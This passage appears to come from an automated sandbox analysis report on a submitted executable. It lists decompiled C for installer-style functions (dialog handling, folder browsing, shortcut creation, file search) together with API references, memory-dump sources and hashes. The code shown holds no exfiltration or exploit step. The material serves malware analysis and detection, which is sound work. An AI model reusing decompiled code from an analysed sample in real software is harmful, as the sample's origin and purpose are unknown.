                                                                                                                          0x0040441e
                                                                                                                          0x004043c6
                                                                                                                          0x004043c7
                                                                                                                          0x004043ce
                                                                                                                          0x004043d8
                                                                                                                          0x004043e0
                                                                                                                          0x004043ed
                                                                                                                          0x00404401
                                                                                                                          0x00404405
                                                                                                                          0x00404405
                                                                                                                          0x00404401
                                                                                                                          0x0040440a
                                                                                                                          0x00404417
                                                                                                                          0x00404417
                                                                                                                          0x004043c4
                                                                                                                          0x00000000
                                                                                                                          0x0040437c
                                                                                                                          0x0040436a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404370
                                                                                                                          0x00000000
                                                                                                                          0x004042db
                                                                                                                          0x004042e8
                                                                                                                          0x004042f1
                                                                                                                          0x004042fe
                                                                                                                          0x004042fe
                                                                                                                          0x00404305
                                                                                                                          0x0040430b
                                                                                                                          0x00404314
                                                                                                                          0x00404317
                                                                                                                          0x0040431a
                                                                                                                          0x00404322
                                                                                                                          0x00404325
                                                                                                                          0x00404328
                                                                                                                          0x0040432e
                                                                                                                          0x00404335
                                                                                                                          0x0040433c
                                                                                                                          0x004045ce
                                                                                                                          0x004045e0
                                                                                                                          0x00404342
                                                                                                                          0x00404345
                                                                                                                          0x00000000
                                                                                                                          0x00404345
                                                                                                                          0x0040433c

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 004042E1
                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                                                                                          • lstrcmpiA.KERNEL32(Call,00420538,00000000,?,?), ref: 004043F9
                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404405
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404417
                                                                                                                            • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                                                                                            • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                            • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                            • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                            • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                                                                                            • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                            • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                                                                                            • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                          • API String ID: 2624150263-1655598669
                                                                                                                          • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                          • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                                                                                          • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                          • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                          0x0040205c
                                                                                                                          0x00402066
                                                                                                                          0x0040206f
                                                                                                                          0x00402079
                                                                                                                          0x00402082
                                                                                                                          0x0040208c
                                                                                                                          0x00402090
                                                                                                                          0x00402090
                                                                                                                          0x00402095
                                                                                                                          0x004020a6
                                                                                                                          0x004020ae
                                                                                                                          0x0040218e
                                                                                                                          0x0040218e
                                                                                                                          0x00402195
                                                                                                                          0x004020b4
                                                                                                                          0x004020b4
                                                                                                                          0x004020c5
                                                                                                                          0x004020c9
                                                                                                                          0x004020cf
                                                                                                                          0x004020d9
                                                                                                                          0x004020db
                                                                                                                          0x004020e6
                                                                                                                          0x004020e9
                                                                                                                          0x004020f6
                                                                                                                          0x004020f8
                                                                                                                          0x004020fa
                                                                                                                          0x00402101
                                                                                                                          0x00402104
                                                                                                                          0x00402104
                                                                                                                          0x00402107
                                                                                                                          0x00402111
                                                                                                                          0x00402119
                                                                                                                          0x0040211e
                                                                                                                          0x0040212a
                                                                                                                          0x0040212a
                                                                                                                          0x0040212d
                                                                                                                          0x00402136
                                                                                                                          0x00402139
                                                                                                                          0x00402142
                                                                                                                          0x00402147
                                                                                                                          0x00402159
                                                                                                                          0x00402168
                                                                                                                          0x0040216a
                                                                                                                          0x00402176
                                                                                                                          0x00402176
                                                                                                                          0x00402168
                                                                                                                          0x00402178
                                                                                                                          0x0040217e
                                                                                                                          0x0040217e
                                                                                                                          0x00402181
                                                                                                                          0x00402187
                                                                                                                          0x0040218c
                                                                                                                          0x004021a1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040218c
                                                                                                                          0x00402197
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 123533781-1104044542
                                                                                                                          • Opcode ID: be968ece18af4a8990e49a46ffb91ad691b7d30926a5843cb181693629e4be0f
                                                                                                                          • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                                                                                          • Opcode Fuzzy Hash: be968ece18af4a8990e49a46ffb91ad691b7d30926a5843cb181693629e4be0f
                                                                                                                          • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 39%
                                                                                                                          			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                          0x00402689
                                                                                                                          0x0040269d
                                                                                                                          0x004026a8
                                                                                                                          0x004026a9
                                                                                                                          0x004027e4
                                                                                                                          0x0040268b
                                                                                                                          0x0040268b
                                                                                                                          0x0040268d
                                                                                                                          0x0040268f
                                                                                                                          0x0040268f
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 335f766a02d87fc4f144a72dfe7bfeb47f84df3e5a293ec2139a669d47195b1b
                                                                                                                          • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                                                                                          • Opcode Fuzzy Hash: 335f766a02d87fc4f144a72dfe7bfeb47f84df3e5a293ec2139a669d47195b1b
                                                                                                                          • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403981, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728);
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64;
							if(_t39 ==  *0x423f64) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133;
							if( *0x42370c != _t133) {
								break;
							}
							__eflags =  *0x4091ac -  *0x423f64; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133;
							_v32 = _t49;
							if( *0x423fcc != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133;
							if( *0x423fcc == _t133) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, 0x423740);
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133;
									if( *0x42370c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133;
								if( *0x423fcc != _t133) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133;
								if( *0x423fc0 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c;
						return 0 |  *0x42370c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133;
										if( *0x423fcc == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133 &&  *0x423718 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421538 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                                          0x0040398a
                                                                                                                          0x00403993
                                                                                                                          0x00403ad4
                                                                                                                          0x00403ad8
                                                                                                                          0x00403adc
                                                                                                                          0x00403ade
                                                                                                                          0x00403ae3
                                                                                                                          0x00403aee
                                                                                                                          0x00403af9
                                                                                                                          0x00403afe
                                                                                                                          0x00403b00
                                                                                                                          0x00403b02
                                                                                                                          0x00403b05
                                                                                                                          0x00403b0a
                                                                                                                          0x00403b18
                                                                                                                          0x00403b25
                                                                                                                          0x00403b2c
                                                                                                                          0x00403b2c
                                                                                                                          0x00403b2d
                                                                                                                          0x00403b2d
                                                                                                                          0x00403b32
                                                                                                                          0x00403b38
                                                                                                                          0x00403b3f
                                                                                                                          0x00403b45
                                                                                                                          0x00403b47
                                                                                                                          0x00403b87
                                                                                                                          0x00403b8c
                                                                                                                          0x00403b91
                                                                                                                          0x00403b91
                                                                                                                          0x00403b96
                                                                                                                          0x00403b9f
                                                                                                                          0x00403ba1
                                                                                                                          0x00403ba6
                                                                                                                          0x00403bac
                                                                                                                          0x00403bb0
                                                                                                                          0x00403bb0
                                                                                                                          0x00403bb5
                                                                                                                          0x00403bbb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bc6
                                                                                                                          0x00403bcc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bd5
                                                                                                                          0x00403bdd
                                                                                                                          0x00403be2
                                                                                                                          0x00403be5
                                                                                                                          0x00403beb
                                                                                                                          0x00403bf0
                                                                                                                          0x00403bf3
                                                                                                                          0x00403bf9
                                                                                                                          0x00403bfe
                                                                                                                          0x00403c01
                                                                                                                          0x00403c07
                                                                                                                          0x00403c0f
                                                                                                                          0x00403c15
                                                                                                                          0x00403c1b
                                                                                                                          0x00403c1f
                                                                                                                          0x00403c26
                                                                                                                          0x00403c26
                                                                                                                          0x00403c26
                                                                                                                          0x00403c30
                                                                                                                          0x00403c42
                                                                                                                          0x00403c4e
                                                                                                                          0x00403c53
                                                                                                                          0x00403c5d
                                                                                                                          0x00403c63
                                                                                                                          0x00403c65
                                                                                                                          0x00403c6a
                                                                                                                          0x00403c67
                                                                                                                          0x00403c67
                                                                                                                          0x00403c67
                                                                                                                          0x00403c7a
                                                                                                                          0x00403c92
                                                                                                                          0x00403c94
                                                                                                                          0x00403c9a
                                                                                                                          0x00403caf
                                                                                                                          0x00403c9c
                                                                                                                          0x00403ca5
                                                                                                                          0x00403ca7
                                                                                                                          0x00403ca7
                                                                                                                          0x00403cb5
                                                                                                                          0x00403cc5
                                                                                                                          0x00403cd6
                                                                                                                          0x00403cdd
                                                                                                                          0x00403ce3
                                                                                                                          0x00403ce7
                                                                                                                          0x00403cec
                                                                                                                          0x00403cee
                                                                                                                          0x00000000
                                                                                                                          0x00403cf4
                                                                                                                          0x00403cf4
                                                                                                                          0x00403cf6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403cfc
                                                                                                                          0x00403d00
                                                                                                                          0x00403d25
                                                                                                                          0x00403d2b
                                                                                                                          0x00403d31
                                                                                                                          0x00403d33
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d59
                                                                                                                          0x00403d5f
                                                                                                                          0x00403d61
                                                                                                                          0x00403d66
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d6c
                                                                                                                          0x00403d6f
                                                                                                                          0x00403d72
                                                                                                                          0x00403d89
                                                                                                                          0x00403d95
                                                                                                                          0x00403dae
                                                                                                                          0x00403db4
                                                                                                                          0x00403db8
                                                                                                                          0x00403dbd
                                                                                                                          0x00403dc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403dcd
                                                                                                                          0x00403dd8
                                                                                                                          0x00000000
                                                                                                                          0x00403dd8
                                                                                                                          0x00403d02
                                                                                                                          0x00403d08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d0e
                                                                                                                          0x00403d14
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d1a
                                                                                                                          0x00403cee
                                                                                                                          0x00403de5
                                                                                                                          0x00403df1
                                                                                                                          0x00403df8
                                                                                                                          0x00000000
                                                                                                                          0x00403b49
                                                                                                                          0x00403b49
                                                                                                                          0x00403b4c
                                                                                                                          0x00403b7f
                                                                                                                          0x00403b7f
                                                                                                                          0x00403b81
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b81
                                                                                                                          0x00403b4e
                                                                                                                          0x00403b52
                                                                                                                          0x00403b57
                                                                                                                          0x00403b59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b69
                                                                                                                          0x00403b71
                                                                                                                          0x00000000
                                                                                                                          0x00403b77
                                                                                                                          0x004039a5
                                                                                                                          0x004039a5
                                                                                                                          0x004039a9
                                                                                                                          0x004039ae
                                                                                                                          0x004039bd
                                                                                                                          0x004039bd
                                                                                                                          0x004039c6
                                                                                                                          0x004039cf
                                                                                                                          0x004039da
                                                                                                                          0x004039da
                                                                                                                          0x004039e6
                                                                                                                          0x00403a02
                                                                                                                          0x00403a05
                                                                                                                          0x00403a18
                                                                                                                          0x00403a1e
                                                                                                                          0x00403ac1
                                                                                                                          0x00000000
                                                                                                                          0x00403aca
                                                                                                                          0x00403a24
                                                                                                                          0x00403a31
                                                                                                                          0x00403a33
                                                                                                                          0x00403a35
                                                                                                                          0x00403a54
                                                                                                                          0x00403a54
                                                                                                                          0x00403a57
                                                                                                                          0x00403a5c
                                                                                                                          0x00403a5f
                                                                                                                          0x00403a6f
                                                                                                                          0x00403a70
                                                                                                                          0x00403a72
                                                                                                                          0x00403aa8
                                                                                                                          0x00403abb
                                                                                                                          0x00000000
                                                                                                                          0x00403abb
                                                                                                                          0x00403a74
                                                                                                                          0x00403a7a
                                                                                                                          0x00403a93
                                                                                                                          0x00403a98
                                                                                                                          0x00403a9a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a9c
                                                                                                                          0x00403a88
                                                                                                                          0x00403a88
                                                                                                                          0x00403a8a
                                                                                                                          0x00403a8a
                                                                                                                          0x00000000
                                                                                                                          0x00403a8a
                                                                                                                          0x00403a7d
                                                                                                                          0x00403a82
                                                                                                                          0x00000000
                                                                                                                          0x00403a82
                                                                                                                          0x00403a61
                                                                                                                          0x00403a67
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a69
                                                                                                                          0x00000000
                                                                                                                          0x00403a69
                                                                                                                          0x00403a59
                                                                                                                          0x00000000
                                                                                                                          0x00403a59
                                                                                                                          0x00403a3f
                                                                                                                          0x00403a46
                                                                                                                          0x00403a4c
                                                                                                                          0x00403a4e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a4e
                                                                                                                          0x00403a0a
                                                                                                                          0x00000000
                                                                                                                          0x004039e8
                                                                                                                          0x004039ee
                                                                                                                          0x004039f8
